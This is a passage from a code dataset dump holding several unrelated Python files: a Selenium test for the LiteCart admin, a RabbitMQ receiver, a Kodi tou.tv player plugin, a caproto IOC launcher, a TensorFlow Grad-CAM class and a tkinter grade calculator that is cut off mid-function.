driver.find_element_by_css_selector(\"div#tab-information [name='short_description[en]']\").send_keys(\"small ball\")\n # enter text to Description text area\n driver.find_element_by_css_selector(\"div#tab-information span.input-wrapper \"\n \"div.trumbowyg-editor\").send_keys(\"This is a ball\")\n # input Head Title\n driver.find_element_by_css_selector(\"div#tab-information [name='head_title[en]']\").send_keys(\"Color Ball\")\n # input Meta Description\n driver.find_element_by_css_selector(\"div#tab-information [name='meta_description[en]']\").send_keys(\"meta\")\n\n\ndef prices_tab(driver):\n # set Purchase Price to 5 US Dollars\n purchase = driver.find_element_by_css_selector(\"div#tab-prices input[name=purchase_price]\")\n ActionChains(driver).move_to_element(purchase).click().send_keys(Keys.UP * 5).perform()\n select = Select(driver.find_element_by_name(\"purchase_price_currency_code\"))\n select.select_by_visible_text(\"US Dollars\")\n # set Price to 5 USD\n driver.find_element_by_css_selector(\"div#tab-prices input[name='prices[USD]']\").send_keys(\"50\")\n\n\n# main part\ndriver = webdriver.Chrome()\ndriver.get(\"http://localhost/litecart/admin/\")\ndriver.find_element_by_name(\"username\").send_keys(\"admin\")\ndriver.find_element_by_name(\"password\").send_keys(\"admin\")\ndriver.find_element_by_name(\"login\").click()\n\n# open Catalog menu\ndriver.find_element_by_css_selector(\"#box-apps-menu a[href$=catalog]\").click()\n\n# click on \"Add New Product\" button\ndriver.find_element_by_css_selector(\"td#content a[href$=edit_product]\").click()\n\n# fill General tab\ngeneral_tab(driver)\n\n# open Information tab\ndriver.find_element_by_css_selector(\"td#content div.tabs ul.index a[href$=tab-information]\").click()\nWebDriverWait(driver, 10)\n# fill Information tab\ninformation_tab(driver)\n\n# open Prices tab\ndriver.find_element_by_css_selector(\"td#content div.tabs ul.index a[href$=tab-prices]\").click()\nWebDriverWait(driver, 10)\n# fill Prices tab\nprices_tab(driver)\n\n# press Save button\ndriver.find_element_by_css_selector(\"td#content span.button-set [name=save]\").click()\nWebDriverWait(driver, 10)\n\n# verify that the added product appears in Catalog\ntable_list = driver.find_elements_by_css_selector(\"td#content table.dataTable tr.row\")\nflag = 0\nfor i in range(len(table_list)):\n if table_list[i].text == \"test product\":\n print(\"New product is added to Catalog\")\n flag = 1\n break\nif flag == 0:\n print(\"New product is NOT added to Catalog\")\n\ndriver.quit()\n","sub_path":"12_Add_new_product.py","file_name":"12_Add_new_product.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"18193816","text":"import pika\n\n\ndef callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='queue0', durable=True)\n\nchannel.basic_consume(queue='queue0',\n auto_ack=True,\n on_message_callback=callback)\nchannel.start_consuming()","sub_path":"Receiver.py","file_name":"Receiver.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"598470685","text":"\nimport os\nimport sys\nimport xbmc\nimport xbmcgui\n\nfrom scraper import getVideo\nfrom traceback import print_exc\n\n\n# set our infolabels\ninfoLabels = {\n \"tvshowtitle\": unicode( xbmc.getInfoLabel( \"ListItem.TvShowTitle\" ), \"utf-8\" ),\n \"title\": unicode( xbmc.getInfoLabel( \"ListItem.Title\" ), \"utf-8\" ),\n \"genre\": unicode( xbmc.getInfoLabel( \"ListItem.Genre\" ), \"utf-8\" ),\n \"plot\": unicode( xbmc.getInfoLabel( \"ListItem.Plot\" ), \"utf-8\" ),\n \"Aired\": unicode( xbmc.getInfoLabel( \"ListItem.Premiered\" ), \"utf-8\" ),\n \"mpaa\": unicode( xbmc.getInfoLabel( \"ListItem.MPAA\" ), \"utf-8\" ),\n \"duration\": unicode( xbmc.getInfoLabel( \"ListItem.DUration\" ), \"utf-8\" ),\n \"studio\": unicode( xbmc.getInfoLabel( \"ListItem.Studio\" ), \"utf-8\" ),\n \"writer\": unicode( xbmc.getInfoLabel( \"ListItem.Writer\" ), \"utf-8\" ),\n \"director\": unicode( xbmc.getInfoLabel( \"ListItem.Director\" ), \"utf-8\" ),\n \"season\": int( xbmc.getInfoLabel( \"ListItem.Season\" ) or \"-1\" ),\n \"episode\": int( xbmc.getInfoLabel( \"ListItem.Episode\" ) or \"1\" ),\n \"year\": int( xbmc.getInfoLabel( \"ListItem.Year\" ) or \"0\" ),\n }\n# set our thumbnail\ng_thumbnail = unicode( xbmc.getInfoImage( \"ListItem.Thumb\" ), \"utf-8\" )\n#set our str watched\ng_strwatched = xbmc.getInfoLabel( \"ListItem.Property(strwatched)\" )\n\n\ndef setWatched( listitem ):\n try:\n sys.modules[ 'resources.lib.toutv' ].setWatched( g_strwatched, refresh=False )\n listitem.setInfo( \"video\", { \"playcount\": 1 } )\n except: print_exc()\n\n\nclass XBMCPlayer( xbmc.Player ):\n \"\"\" Subclass of XBMC Player class.\n Overrides onplayback events, for custom actions.\n but onplayback not work with rtmp ! :(\n \"\"\"\n def _play( self, url, listitem ):\n xbmc.log( \"TouTvPlayer: \" + url, xbmc.LOGNOTICE )\n self.listitem = listitem\n self.play( url, self.listitem )\n\n def onPlayBackStarted( self ):\n xbmc.log( \"TouTvPlayer::onPlayBackStarted\", xbmc.LOGNOTICE )\n\n def onPlayBackEnded( self ):\n xbmc.log( \"TouTvPlayer::onPlayBackEnded\", xbmc.LOGNOTICE )\n setWatched()\n\n def onPlayBackStopped( self ):\n try: xbmc.log( \"Resume: %r\" % self.getTime(), xbmc.LOGNOTICE )\n except: pass\n xbmc.log( \"TouTvPlayer::onPlayBackStopped\", xbmc.LOGNOTICE )\n\n\nclass TouTvPlayer( XBMCPlayer ):\n def __new__( cls, *args ):\n return XBMCPlayer.__new__( cls, *args )\n\n\ndef playVideo( PID, startoffset=None, strwatched=None, listitem=None ):\n global g_strwatched\n if not g_strwatched and strwatched is not None:\n g_strwatched = strwatched\n\n # set our play path\n rtsp_url = getVideo( PID )\n\n #set listitem\n if listitem is None:\n listitem = xbmcgui.ListItem( infoLabels[ \"title\" ], '', \"DefaultVideo.png\", g_thumbnail )\n listitem.setInfo( \"Video\", infoLabels )\n\n #listitem.setProperty( \"PlayPath\", playpath )\n listitem.setProperty( \"swfUrl\", \"http://lg.tou.tv/SSRtmpPlayer.swf\" )\n listitem.setProperty( \"PID\", PID )\n\n if str( startoffset ).isdigit():\n listitem.setProperty( \"startoffset\", str( startoffset ) ) #in second\n\n # play media\n #player = TouTvPlayer( xbmc.PLAYER_CORE_DVDPLAYER )\n setWatched( listitem )\n player = xbmc.Player( xbmc.PLAYER_CORE_DVDPLAYER )\n player.play( rtsp_url, listitem )\n\n\nif ( __name__ == \"__main__\" ):\n try:\n # get pid\n PID = sys.argv[ 1 ]\n playVideo( PID )\n except:\n print_exc()\n\n","sub_path":"French/plugin.video.tou.tv/resources/lib/TouTvPlayer.py","file_name":"TouTvPlayer.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"118789676","text":"from caproto.server import ioc_arg_parser, run\nfrom caproto.threading import pyepics_compat as epics\nfrom h5py import File as h5file\nfrom satt_app import *\n\n################################################\nprefix = \"AT2L0:SIM\"\nnum_blades = 18\neV_name = \"LCLS:HXR:BEAM:EV\"\npmps_run_name = \"PMPS:HXR:AT2L0:RUN\"\npmps_tdes_name = \"PMPS:HXR:AT2L0:T_DES\"\nabs_data = h5file('../../../absorption_data.h5', 'r')\nconfig_data = h5file('../../../configs.h5', 'r')\n################################################\n\nioc_args = {\n\"absorption_data\" : abs_data,\n\"config_data\" : config_data,\n\"filter_group\" : [str(N+1).zfill(2) for N in range(num_blades)],\n \"eV_pv\" : eV_name,\n \"pmps_run_pv\" : pmps_run_name,\n \"pmps_tdes_pv\" : pmps_tdes_name\n}\n\nif __name__ == '__main__':\n ioc_options, run_options = ioc_arg_parser(\n default_prefix=prefix,\n desc=IOCMain.__doc__)\n\n ioc = create_ioc(\n **ioc_args,\n **ioc_options)\n\n run(ioc.pvdb, **run_options)\n","sub_path":"caproto/ioc-satt-dev/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"131068836","text":"import os\nimport numpy as np\nimport tensorflow as tf\n\n\nclass ClassActivateMap:\n def __init__(self,\n ckpt_fp,\n label2id_dct,\n input_tensor_name_lst,\n conv_layer_tensor_name2filter_size_dct,\n logits_tensor_name=''):\n #\n self.label2id_dct = label2id_dct\n self.id2label_dct = {id_: label_ for label_, id_ in self.label2id_dct.items()}\n self.input_tensor_name_lst = input_tensor_name_lst\n self.logits_tensor_name = logits_tensor_name\n self.conv_layer_tensor_name2filter_size_dct = conv_layer_tensor_name2filter_size_dct\n #找到.meta文件\n meta_fp = os.path.join(ckpt_fp, [fp for fp in os.listdir(ckpt_fp) if '.meta' in fp][0])\n #创建一个图\n tf.reset_default_graph()\n self.g = tf.Graph()\n with self.g.as_default():\n saver = tf.train.import_meta_graph(meta_fp)\n #设置session的配置\n config = tf.ConfigProto(device_count={\"CPU\": 1},\n inter_op_parallelism_threads=6,\n intra_op_parallelism_threads=6,\n log_device_placement=False)\n self.sess = tf.Session(graph=self.g, config=config)\n with self.sess.as_default(), self.g.as_default():\n checkpoint = tf.train.latest_checkpoint(ckpt_fp)\n #恢复模型\n if checkpoint:\n saver.restore(self.sess, checkpoint)\n print(\"[INFO] restore from the checkpoint {0}\".format(checkpoint))\n # for t in tf.get_default_graph().as_graph_def().node:\n # print(t.name)\n # 定义输入接口\n self.input_tensor_lst = []\n for tensor_name in self.input_tensor_name_lst:\n self.input_tensor_lst.append(self.g.get_tensor_by_name(tensor_name))\n #定义输出接口\n self.logits = self.g.get_tensor_by_name(self.logits_tensor_name)\n\n def get_conv_out(self, conv_i_name):\n #获取CNN中的filter输出\n return self.g.get_tensor_by_name(conv_i_name)\n\n def get_single_grad_cam(self, label_id, conv_i_name):\n #\n with self.g.as_default():\n #构建一个mask用于获取指定类别的logits值\n mask = tf.one_hot(label_id, depth=len(self.label2id_dct))\n # 0-dim, a scalar\n y_c = tf.reduce_sum(tf.multiply(mask, self.logits))\n # [batch_size, max_sentence_len, 1(input_channels), num_filters], 即logits对CNN中每个filter元素的导数值\n conv_out = self.get_conv_out(conv_i_name)\n grads = tf.gradients(y_c, conv_out)[0]\n # [batch_size, max_sentence_len, 1(input_channels), num_filters]\n grads_norm = tf.div(grads, tf.sqrt(tf.reduce_mean(tf.square(grads))) + tf.constant(1e-5))\n # squeeze axis=0 because batch_size=1, axis=2 because input_channels=1\n # (num_filters,) 对应着CNN中每个filter map的重要性\n alpha_c_k = tf.reduce_mean(tf.squeeze(grads_norm, axis=[0, 2]), axis=0)\n # [batch_size, max_sentence_len, 1] through boardcasting\n L_gradcam = tf.nn.relu(tf.reduce_sum(tf.multiply(conv_out, alpha_c_k), axis=-1))\n #最大值归一化\n L_gradcam = tf.div(L_gradcam, tf.reduce_max(L_gradcam) + tf.constant(1e-5))\n return tf.squeeze(L_gradcam)\n\n\n def get_rank_label(self, feed_dict):\n #获取最大logits\n score = self.sess.run(self.logits, feed_dict)\n score_label_tpl = sorted(zip(score[0], list(self.label2id_dct.keys())), key=lambda x: x[0], reverse=True)\n for sco, label in score_label_tpl:\n print((label, sco))\n # #\n # conv = self.get_conv_out('representation_layer/conv-maxpool-3/relu:0')\n # print('conv output:{}'.format(self.sess.run(conv, feed_dict)))\n return score_label_tpl[0]\n\n\n def get_text_final_cam(self, input_value_lst, target_label, max_sentence_len, true_length):\n #构造输入feed_dict\n feed_dict = dict(zip(self.input_tensor_name_lst, input_value_lst))\n #确定label id\n if target_label == 'top':\n score, label = self.get_rank_label(feed_dict)\n print('the selected label: {}, score:{:.4}'.format(label, 1/(1+np.exp(-score))))\n else:\n label = target_label\n print('the selected label: {}'.format(label))\n #用于累积每个filter map给出的文本片段重要性\n cam = np.zeros(max_sentence_len, dtype=np.float32)\n #用于累积每个文本片段被这些filter map卷积过多少次,该值后面用于归一化\n position_vote_num = np.zeros(max_sentence_len, dtype=np.float32)\n for conv_i_name, filter_size in self.conv_layer_tensor_name2filter_size_dct.items():\n cam_filter_i = self.sess.run(self.get_single_grad_cam(self.label2id_dct[label], conv_i_name), feed_dict=feed_dict)\n for i, activation_i in enumerate(cam_filter_i):\n cam[i:i + filter_size] += activation_i\n position_vote_num[i:i + filter_size] += 1\n #卷积数归一化\n cam /= position_vote_num\n #最大值归一化\n cam /= cam.max()\n return cam[:true_length].reshape(1, -1)\n","sub_path":"src/class_activate_map/ClassActivateMap.py","file_name":"ClassActivateMap.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"215948209","text":"from tkinter import * # Imports tkinter package\r\n\r\n\r\n\r\nclass GradeCalc(Tk): # Grade Calculator Class. tkinter is inherited\r\n\r\n def __init__(self, master=None): # Initializer of the GradeCalc class\r\n Tk.__init__(self)\r\n self.master = master\r\n\r\n self.headerFont = (\"Helvetica\", \"12\", \"bold italic\") # Fonts for various areas in the GUI\r\n self.calculateFont = (\"Helvetica\", \"18\", \"bold\")\r\n self.finalFont = (\"Helvetica\", \"24\", \"bold\")\r\n self.finalLetterFont = (\"Helvetica\", \"48\", \"bold\")\r\n self.directionsFont = (\"Times New Roman\", \"10\", \"italic\")\r\n\r\n self.examNumber = 1 # Each section is assigned a number to keep track and label how many there are\r\n self.assignmentNumber = 1\r\n self.labNumber = 1\r\n self.essayNumber = 1\r\n self.quizNumber = 1\r\n self.finalExamNumber = 1\r\n\r\n self.examList = [] # Each section stores its contents in a list\r\n self.assignmentList = []\r\n self.labList = []\r\n self.essayList = []\r\n self.quizList = []\r\n self.finalExamList = []\r\n\r\n self.examWeight = 0 # Each section has a weight, based on it's importance to the overall class score\r\n self.assignmentWeight = 0\r\n self.labWeight = 0\r\n self.essayWeight = 0\r\n self.quizWeight = 0\r\n self.finalExamWeight = 0\r\n\r\n self.something = 0.0 # A variable that is later used to averages can be stored and recalculated\r\n\r\n self.CreateHeadings() # Calls the CreateHeadings function, which creates many of the main parts of the GUI\r\n\r\n self.gradeScale = self.CreateGradeScale() # Calls the CreateGradeScale function which reates the grade scale for the class\r\n\r\n self.directionsPopUp() # Calls the function that shows the directions on top of the grade calculator\r\n\r\n\r\n def CreateHeadings(self): # Creates the main parts of the grade calculator GUI including the section headings and labels\r\n examTitleLabel = Label(self, text='Exams', font=self.headerFont)\r\n examTitleLabel.grid(row=0, column=0, columnspan=2) # Exam Section Title\r\n Label(self, text=\"Exam Weight\").grid(row=1, column=0) # Exam weight label\r\n self.examWeight = Entry(self) # Exam weight entry box\r\n self.examWeight.insert(0, 0) # Default value of 0\r\n self.examWeight.grid(row=1, column=1)\r\n self.btnAddExam = Button(self, text=\"Add Exam\", command=self.addExam) # Add exam button\r\n self.btnAddExam.grid(row=1, column=3, padx=(0, 50))\r\n Label(self, text=\"Exam Title\").grid(row=3, column=0) # Exam column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=3, column=1) # Score column title\r\n\r\n assignmentTitleLabel = Label(self, text='Assignments', font=self.headerFont) # Assignment Section Title\r\n assignmentTitleLabel.grid(row=0, column=4, columnspan=2)\r\n Label(self, text=\"Assignment Weight\").grid(row=1, column=4) # Assignment weight label\r\n self.assignmentWeight = Entry(self) # Assignment weight entry box\r\n self.assignmentWeight.grid(row=1, column=5)\r\n self.assignmentWeight.insert(0, 0) # Default value of 0\r\n self.btnAddAssignment = Button(self, text=\"Add Assignment\", command=self.addAssignment) # Add assignment button\r\n self.btnAddAssignment.grid(row=1, column=7, padx=(0, 50))\r\n Label(self, text=\"Assignment Title\").grid(row=3, column=4) # Assignment column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=3, column=5) # Score column title\r\n\r\n labTitleLabel = Label(self, text='Labs', font=self.headerFont) # Lab Section Title\r\n labTitleLabel.grid(row=0, column=8, columnspan=2)\r\n Label(self, text=\"Lab Weight\").grid(row=1, column=8) # Lab weight label\r\n self.labWeight = Entry(self) # Lab weight entry box\r\n self.labWeight.grid(row=1, column=9)\r\n self.labWeight.insert(0, 0) # Default value of 0\r\n self.btnAddLab = Button(self, text=\"Add Lab\", command=self.addLab) # Add lab button\r\n self.btnAddLab.grid(row=1, column=11, padx=(0, 20))\r\n Label(self, text=\"Lab Title\").grid(row=3, column=8) # Lab column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=3, column=9) # Lab column title\r\n\r\n essayTitleLabel = Label(self, text='Essays', font=self.headerFont) # Essay Section Title\r\n essayTitleLabel.grid(row=20, column=8, columnspan=2, pady=(50, 0))\r\n Label(self, text=\"Essay Weight\").grid(row=21, column=8) # Essay weight label\r\n self.essayWeight = Entry(self) # Lab weight entry box\r\n self.essayWeight.grid(row=21, column=9)\r\n self.essayWeight.insert(0, 0) # Default value of 0\r\n self.btnAddEssay = Button(self, text=\"Add Essay\", command=self.addEssay) # Add essay button\r\n self.btnAddEssay.grid(row=21, column=11, padx=(0, 20))\r\n Label(self, text=\"Essay Title\").grid(row=22, column=8) # Essay column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=22, column=9) # Essay column title\r\n\r\n quizTitleLabel = Label(self, text='Quizzes', font=self.headerFont) # Quiz Section Title\r\n quizTitleLabel.grid(row=20, column=0, columnspan=2, pady=(50, 0))\r\n Label(self, text=\"Quiz Weight\").grid(row=21, column=0) # Quiz weight label\r\n self.quizWeight = Entry(self) # Quiz weight entry box\r\n self.quizWeight.grid(row=21, column=1)\r\n self.quizWeight.insert(0, 0) # Default value of 0\r\n self.btnAddQuiz = Button(self, text=\"Add Quiz\", command=self.addQuiz) # Add quiz button\r\n self.btnAddQuiz.grid(row=21, column=3, padx=(0, 20))\r\n Label(self, text=\"Quiz Title\").grid(row=22, column=0) # Quiz column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=22, column=1) # Score column title\r\n\r\n finalExamTitleLabel = Label(self, text='Final Exam', font=self.headerFont) # Final Exam Section Title\r\n finalExamTitleLabel.grid(row=20, column=4, columnspan=2, pady=(50, 0))\r\n Label(self, text=\"Final Exam Weight\").grid(row=21, column=4) # Final Exam weight label\r\n self.finalExamWeight = Entry(self) # Final Exam weight entry box\r\n self.finalExamWeight.grid(row=21, column=5)\r\n self.finalExamWeight.insert(0, 0) # Default value of 0\r\n self.btnAddFinalExam = Button(self, text=\"Add Final Exam\", command=self.addFinalExam) # Add final exam button\r\n self.btnAddFinalExam.grid(row=21, column=7, padx=(0, 20))\r\n Label(self, text=\"Final Exam Title\").grid(row=22, column=4) # Final Exam column title\r\n Label(self, text=\"Score (Out of 100)\").grid(row=22, column=5) # Score column title\r\n\r\n finalGradeTitleLabel = Label(self, text=\"Final Grade\", font=self.headerFont) # A label that says \"Final Grade\"\r\n finalGradeTitleLabel.grid(row=20, column=15, columnspan=2)\r\n\r\n self.calculateClassScore = Button(self, text=\"Calculate\", font=self.calculateFont, command=self.Calculate, bg=\"green\") # Calculate button\r\n self.calculateClassScore.grid(row=16, column=15, rowspan=4, pady=(25, 15))\r\n\r\n directionsButton = Button(self, text=\"Directions\", command=self.directionsPopUp, bg=\"grey\") # Button to open up directions popup\r\n directionsButton.grid(row=0, column=15, rowspan=2)\r\n\r\n quitButton = Button(self, text=\"Quit\", command=sys.exit, bg=\"red\") # Button to quit the grade calculator. Terminates all processes\r\n quitButton.grid(row=2, column=15, rowspan=2, pady=(0, 25))\r\n\r\n\r\n def directionsPopUp(self): # Function that creates a directions popup for the user to read and follow\r\n popUp = Toplevel()\r\n popUp.title(\"Directions\")\r\n popUp.attributes('-topmost', 1) # Places the popup window on top of the grade calculator window\r\n directions = Message(popUp, text=\"Welcome to the Grade Calculator \\n\"\r\n \"1. Edit the grade scale first \\n\"\r\n \"2. Enter the weights for each section \\n\"\r\n \"After you add a section, please enter the score right away \\n\"\r\n \"(Only the last score can be edited) \\n\"\r\n \"Press calculate to update averages for each section and the class score\",\r\n font=self.directionsFont)\r\n directions.pack()\r\n dismiss = Button(popUp, text=\"OK\", command=popUp.destroy) # OK button closes the popup\r\n dismiss.pack()\r\n popUp.geometry(\"400x200\")\r\n\r\n def CreateGradeScale(self): # A function that creates a grade scale, customizable to the user\r\n\r\n Label(self, text='Grade').grid(row=4, column=14)\r\n Label(self, text=\"A\").grid(row=5, column=14)\r\n Label(self, text=\"A-\").grid(row=6, column=14)\r\n Label(self, text=\"B+\").grid(row=7, column=14)\r\n Label(self, text=\"B\").grid(row=8, column=14)\r\n Label(self, text=\"B-\").grid(row=9, column=14)\r\n Label(self, text=\"C+\").grid(row=10, column=14)\r\n Label(self, text=\"C\").grid(row=11, column=14)\r\n Label(self, text=\"C-\").grid(row=12, column=14)\r\n Label(self, text=\"D+\").grid(row=13, column=14)\r\n Label(self, text=\"D\").grid(row=14, column=14)\r\n\r\n Label(self, text=\"Percent\").grid(row=4, column=15)\r\n\r\n a_value = Entry(self) # The following lines are entry boxes for their respective letter grades\r\n a_value.grid(row=5, column=15)\r\n a_value.insert(0, 93) # Each is given a default value that can changed\r\n\r\n a_minus_value = Entry(self)\r\n a_minus_value.grid(row=6, column=15)\r\n a_minus_value.insert(0, 90)\r\n\r\n b_plus_value = Entry(self)\r\n b_plus_value.grid(row=7, column=15)\r\n b_plus_value.insert(0, 87)\r\n\r\n b_value = Entry(self)\r\n b_value.grid(row=8, column=15)\r\n b_value.insert(0, 83)\r\n\r\n b_minus_value = Entry(self)\r\n b_minus_value.grid(row=9, column=15)\r\n b_minus_value.insert(0, 80)\r\n\r\n c_plus_value = Entry(self)\r\n c_plus_value.grid(row=10, column=15)\r\n c_plus_value.insert(0, 77)\r\n\r\n c_value = Entry(self)\r\n c_value.grid(row=11, column=15)\r\n c_value.insert(0, 73)\r\n\r\n c_minus_value = Entry(self)\r\n c_minus_value.grid(row=12, column=15)\r\n c_minus_value.insert(0, 70)\r\n\r\n d_plus_value = Entry(self)\r\n d_plus_value.grid(row=13, column=15)\r\n d_plus_value.insert(0, 67)\r\n\r\n d_value = Entry(self)\r\n d_value.grid(row=14, column=15)\r\n d_value.insert(0, 63)\r\n\r\n grade_scale = [float(a_value.get()), float(a_minus_value.get()), float(b_plus_value.get()),\r\n float(b_value.get()),\r\n float(b_minus_value.get()), float(c_plus_value.get()), float(c_value.get()),\r\n float(c_minus_value.get()),\r\n float(d_plus_value.get()), float(d_value.get())]\r\n return grade_scale # The grade scale and the values are added to a list and that list is returned so they can be accessed by later functions\r\n\r\n\r\n def getGrade(self, fp, gs): # A function that determines the letter grade according to the final percent and the grade scale\r\n if fp >= gs[0]:\r\n return 'A'\r\n elif fp >= gs[1]:\r\n return 'A-'\r\n elif fp >= gs[2]:\r\n return 'B+'\r\n elif fp >= gs[3]:\r\n return 'B'\r\n elif fp >= gs[4]:\r\n return 'B-'\r\n elif fp >= gs[5]:\r\n return 'C+'\r\n elif fp >= gs[6]:\r\n return 'C'\r\n elif fp >= gs[7]:\r\n return 'C-'\r\n elif fp >= gs[8]:\r\n return 'D+'\r\n elif fp >= gs[9]:\r\n return 'D'\r\n else:\r\n return 'F'\r\n\r\n\r\n # *** All add functions are the same, but with different labels. They all work in the same way ***\r\n def addExam(self): # A function that adds an exam to the grade calculator\r\n\r\n if len(self.examList) != 0: # If there is an exam in the list already, the previous grade is stored.\r\n previousGrade = float(self.examGrade.get()) # This is so a user can change a grade and the new score is recorded\r\n examName = Entry(self) # The user is able to change the name of the exam.\r\n examName.grid(row=self.examNumber + 3, column=0)\r\n examName.insert(0, \"Exam \" + str(self.examNumber)) # By default, each exam is named exam + the exam number\r\n self.examGrade = Entry(self) # Entry box for the exam grade\r\n self.examGrade.grid(row=self.examNumber + 3, column=1)\r\n self.examGrade.insert(0, 0) # The default grade for each exam is 0\r\n\r\n if len(self.examList) == 0: # If there haven't been any exams recorded, the grade just entered is added\r\n self.examList.append(float(self.examGrade.get()))\r\n else:\r\n self.examList.append(float(previousGrade)) # If there are exams already, the previous grade is added. Again, so the user can edit\r\n\r\n sum = 0\r\n for i in range(len(self.examList)): # A for loop that goes through the list of exams and updates the exam average. Doesn't include newest exam that is 0\r\n sum += self.examList[i]\r\n if len(self.examList) != 0:\r\n newAvg = sum / len(self.examList)\r\n else:\r\n newAvg = 0 # If there is only 1 exam, the average is 0 because the new score hasn't been added to the list yet\r\n\r\n self.something = newAvg # Variable needed to store the averages as they update\r\n\r\n examAvg = Label(self, text=self.something) # Displays the new exam average\r\n Label(self, text=\"Exam Average\").grid(row=self.examNumber + 4, column=0) # Shows the exam average so far\r\n examAvg.grid(row=self.examNumber + 4, column=1)\r\n\r\n self.examNumber += 1 # The exam number is incremented\r\n\r\n\r\n def addAssignment(self):\r\n\r\n if len(self.assignmentList) != 0:\r\n previousGrade = float(self.assignmentGrade.get())\r\n assignmentName = Entry(self)\r\n assignmentName.grid(row=self.assignmentNumber + 3, column=4)\r\n assignmentName.insert(0, \"Assignment \" + str(self.assignmentNumber))\r\n self.assignmentGrade = Entry(self)\r\n self.assignmentGrade.grid(row=self.assignmentNumber + 3, column=5)\r\n self.assignmentGrade.insert(0, 0)\r\n\r\n if len(self.assignmentList) == 0:\r\n self.assignmentList.append(float(self.assignmentGrade.get()))\r\n else:\r\n self.assignmentList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.assignmentList)):\r\n sum += self.assignmentList[i]\r\n if len(self.assignmentList) != 0:\r\n newAvg = sum / len(self.assignmentList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n assignmentAvg = Label(self, text=self.something)\r\n assignmentAvg.grid(row=self.assignmentNumber + 4, column=5)\r\n Label(self, text=\"Assignment Average\").grid(row=self.assignmentNumber + 4, column=4)\r\n\r\n self.assignmentNumber += 1\r\n\r\n\r\n def addLab(self):\r\n\r\n if len(self.labList) != 0:\r\n previousGrade = float(self.labGrade.get())\r\n labName = Entry(self)\r\n labName.grid(row=self.labNumber + 3, column=8)\r\n labName.insert(0, \"Lab \" + str(self.labNumber))\r\n self.labGrade = Entry(self)\r\n self.labGrade.grid(row=self.labNumber + 3, column=9)\r\n self.labGrade.insert(0, 0)\r\n\r\n if len(self.labList) == 0:\r\n self.labList.append(float(self.labGrade.get()))\r\n else:\r\n self.labList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.labList)):\r\n sum += self.labList[i]\r\n if len(self.labList) != 0:\r\n newAvg = sum / len(self.labList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n labAvg = Label(self, text=self.something)\r\n Label(self, text=\"Lab Average\").grid(row=self.labNumber + 4, column=8)\r\n labAvg.grid(row=self.labNumber + 4, column=9)\r\n\r\n self.labNumber += 1\r\n\r\n\r\n def addQuiz(self):\r\n\r\n if len(self.quizList) != 0:\r\n previousGrade = float(self.quizGrade.get())\r\n quizName = Entry(self)\r\n quizName.grid(row=self.quizNumber + 22, column=0)\r\n quizName.insert(0, \"Quiz \" + str(self.quizNumber))\r\n self.quizGrade = Entry(self)\r\n self.quizGrade.grid(row=self.quizNumber + 22, column=1)\r\n self.quizGrade.insert(0, 0)\r\n\r\n if len(self.quizList) == 0:\r\n self.quizList.append(float(self.quizGrade.get()))\r\n else:\r\n self.quizList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.quizList)):\r\n sum += self.quizList[i]\r\n if len(self.quizList) != 0:\r\n newAvg = sum / len(self.quizList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n quizAvg = Label(self, text=self.something)\r\n Label(self, text=\"Quiz Average\").grid(row=self.quizNumber + 23, column=0)\r\n quizAvg.grid(row=self.quizNumber + 23, column=1)\r\n\r\n self.quizNumber += 1\r\n\r\n\r\n def addFinalExam(self):\r\n\r\n if len(self.finalExamList) != 0:\r\n previousGrade = float(self.finalExamGrade.get())\r\n finalExamName = Entry(self)\r\n finalExamName.grid(row=self.finalExamNumber + 22, column=4)\r\n finalExamName.insert(0, \"Final Exam\")\r\n self.finalExamGrade = Entry(self)\r\n self.finalExamGrade.grid(row=self.finalExamNumber + 22, column=5)\r\n self.finalExamGrade.insert(0, 0)\r\n\r\n if len(self.finalExamList) == 0:\r\n self.finalExamList.append(float(self.finalExamGrade.get()))\r\n else:\r\n self.finalExamList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.finalExamList)):\r\n sum += self.finalExamList[i]\r\n if len(self.finalExamList) != 0:\r\n newAvg = sum / len(self.finalExamList)\r\n else:\r\n newAvg = 0\r\n\r\n self.something = newAvg\r\n\r\n finalExamAvg = Label(self, text=self.something)\r\n finalExamAvg.grid(row=self.finalExamNumber + 23, column=5)\r\n Label(self, text=\"Final Exam Average\").grid(row=self.finalExamNumber + 23, column=4)\r\n\r\n self.finalExamNumber += 1\r\n\r\n\r\n def addEssay(self):\r\n\r\n if len(self.essayList) != 0:\r\n previousGrade = float(self.essayGrade.get())\r\n essayName = Entry(self)\r\n essayName.grid(row=self.essayNumber + 22, column=8)\r\n essayName.insert(0, \"Essay \" + str(self.essayNumber))\r\n self.essayGrade = Entry(self)\r\n self.essayGrade.grid(row=self.essayNumber + 22, column=9)\r\n self.essayGrade.insert(0, 0)\r\n\r\n if len(self.essayList) == 0:\r\n self.essayList.append(float(self.essayGrade.get()))\r\n else:\r\n self.essayList.append(float(previousGrade))\r\n\r\n sum = 0\r\n for i in range(len(self.essayList)):\r\n sum += self.essayList[i]\r\n if len(self.essayList) != 0:\r\n newAvg = sum / len(self.essayList)\r\n 